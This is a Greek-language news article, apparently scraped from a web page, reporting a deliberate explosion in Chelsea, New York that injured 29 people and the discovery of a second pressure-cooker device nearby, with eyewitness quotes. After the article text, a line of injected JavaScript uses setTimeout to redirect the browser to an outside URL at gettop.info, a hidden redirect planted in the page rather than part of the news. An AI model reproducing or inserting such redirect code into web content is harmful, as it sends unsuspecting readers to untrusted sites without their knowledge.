Έκρηξη στο κέντρο της Νέας Υόρκης -29 τραυματίες – Δεν σχετίζεται με τρομοκρατία (ΒΙΝΤΕΟ)

0
13

 

Μία συγκλονιστική έκρηξη συντάραξε την περιοχή του Τσέλσι στη Νέα Υόρκη ενώ προκάλεσε αρκετές υλικές ζημιές σε κίριο. Πεζοί πανικόβλητοι άρχισαν να τρέχουν να σωθούν τη στιγμή που τζάμια, παράθυρα, μέταλλα εκτινάσσονταν σε κάθε κατεύθυνση. Περίπου 29 άτομα έχουν τραυματιστεί σύμφωνα με τον μέχρι στιγμής απολογισμό.

Πρόκειται για σκόπιμη ενέργεια σύμφωνα με τον δήμαρχο της Νέας Υόρκη Μπιλ ντε Μπλάζιο αλλά ο ίδιος τόνισε ότι δεν υπάρει συσχετισμός με τρομοκρατία.

Μία δεύτερη εκρηκτική συσκευή, μία χύτρα ταχύτητας συνδεδεμένη με καλώδια και μία κινητή συσκευή εντοπίστηκαν μέσα σε μία σακούλα σκουπιδιών τέσσερις δρόμους πιο κάτω όπως ανέφεραν αστυνομικές πηγές. Μέσα στην ίδια σακούλα βρέθηκε και ένα λευκό χαρτί αλλά ακόμη δεν δημοσιοποιήθηκε τι ήταν γραμμένο επάνω.

new-york-explosion

Δεν υπήρξαν συλλήψεις ενώ από τους 29 τραυματίες οι 24 διεκομίσθησαν σε νοσοκομεία της περιοχής με ελαφρά τραύματα. Ένα άτομο είναι σε κρίσιμη κατάσταση. Αυτόπτης μάρτυρας ανεφερε πως η έκρηξη ήταν παρόμοια με ηφαίστειο. «Ολόκληρο το τετράγωνο σείστηκε από τα θεμέλια. Η φωτιά ξεχύθηκε στον αέρα. Άνθρωποι έτρεχαν για τη ζωή τους» δήλωσε μια γυναίακ γύρω στα 50 που δνε κατονομάστηκε. Άλλος αυτόπτης μάρτυρας ανέφερε πως οι τραυματίες έφεραν στο σώμα τους και κυρίως στο πρόσωπό τους κομμάτια λιωμένου μετάλλου που εκτοξεύτηκαν από το κτίριο.

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here